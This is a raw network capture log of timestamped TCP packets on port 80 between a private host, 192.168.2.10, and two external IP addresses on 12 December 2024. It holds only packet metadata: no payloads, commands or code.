                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.304528952 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.304579020 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.304594994 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.304641008 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.306992054 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.307065964 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.307100058 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.307146072 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.307526112 CET8049933185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.307970047 CET8049938185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.308036089 CET4993880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.308089018 CET4993880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.309741020 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.309793949 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.309843063 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.309962988 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.312174082 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.312221050 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.312264919 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.312300920 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.314730883 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.314791918 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.314901114 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.315038919 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.317270994 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.317312956 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.317409039 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.317460060 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.320147991 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.320161104 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.320302963 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.322467089 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.322577953 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.322624922 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.325006008 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.325062037 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.325205088 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.325311899 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.327569962 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.327708006 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.327730894 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.327747107 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.330187082 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.330256939 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.330322981 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.330425978 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.332753897 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.332808018 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.332855940 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.332897902 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.335433006 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.335478067 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.335530043 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.335585117 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.337873936 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.337924004 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.337966919 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.340475082 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.340523005 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.340572119 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.340615988 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.342988968 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.343050957 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.427948952 CET8049938185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.429929018 CET4993880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.445559025 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.445579052 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.445642948 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.446489096 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.446530104 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.446574926 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.448692083 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.448774099 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.448846102 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.450920105 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.450997114 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.450999975 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.451639891 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.453165054 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.453223944 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.453283072 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.455363035 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.455390930 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.455449104 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.457524061 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.457582951 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.457645893 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.459634066 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.459762096 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.459811926 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.461707115 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.461724043 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.461761951 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.461807013 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.463774920 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.463790894 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.463839054 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.465758085 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.465769053 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.465848923 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.467784882 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.467799902 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.467856884 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.469731092 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.469810963 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.469835997 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.471632004 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.471645117 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.471678019 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.472127914 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.472172976 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.473725080 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.473736048 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.473792076 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.475634098 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.477509975 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.477590084 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.477602005 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.477634907 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.477639914 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.477710009 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.479631901 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.479686975 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.479697943 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.479773998 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.481642962 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.481657028 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.481726885 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.483503103 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.483593941 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.483640909 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.483650923 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.485636950 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.485651970 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.485686064 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.485697031 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.487638950 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.487652063 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.487694979 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.489478111 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.489540100 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.489562035 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.489614964 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.491514921 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.491566896 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.491631985 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.493721008 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.493737936 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.493787050 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.495439053 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.495491028 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.495517969 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.495558977 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.497514963 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.497531891 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.497564077 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.497574091 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.499506950 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.499528885 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.499556065 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.499581099 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.501494884 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.501516104 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.501569986 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.503366947 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.503493071 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.503624916 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.503663063 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.505578995 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.505604982 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.505645990 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.507584095 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.507600069 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.507628918 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.507637024 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.509308100 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.509341955 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.509831905 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.510063887 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.511365891 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.511408091 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.512001038 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.512047052 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.513510942 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.513529062 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.513556957 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.513586044 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.515367985 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.515382051 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.515419960 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.517343998 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.517355919 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.517420053 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.519247055 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.519377947 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.519382000 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.519411087 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.521330118 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.521342993 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.521368980 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.521388054 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.523236036 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.523250103 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.523303032 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.523303032 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.525228024 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.525243044 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.525322914 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.527173996 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.527189016 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.527224064 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.529103041 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.529151917 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.529253006 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.529288054 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.531183004 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.531194925 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.531224966 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.531266928 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.533358097 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.533370972 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.533412933 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.533440113 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.535115957 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.535130024 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.535166025 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.537080050 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.537161112 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.537199020 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.537429094 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.539299965 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.539329052 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.539356947 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.539393902 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.541110992 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.541126013 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.541179895 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.541179895 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.543082952 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.543103933 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.543338060 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.543338060 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.545074940 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.545294046 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.545361042 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.545572042 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.547063112 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.547077894 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.547117949 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.548922062 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.549150944 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.549822092 CET8049938185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.637638092 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.637653112 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.637727976 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.637877941 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.638216019 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.638228893 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.638277054 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.638277054 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.639870882 CET804993131.41.244.11192.168.2.10
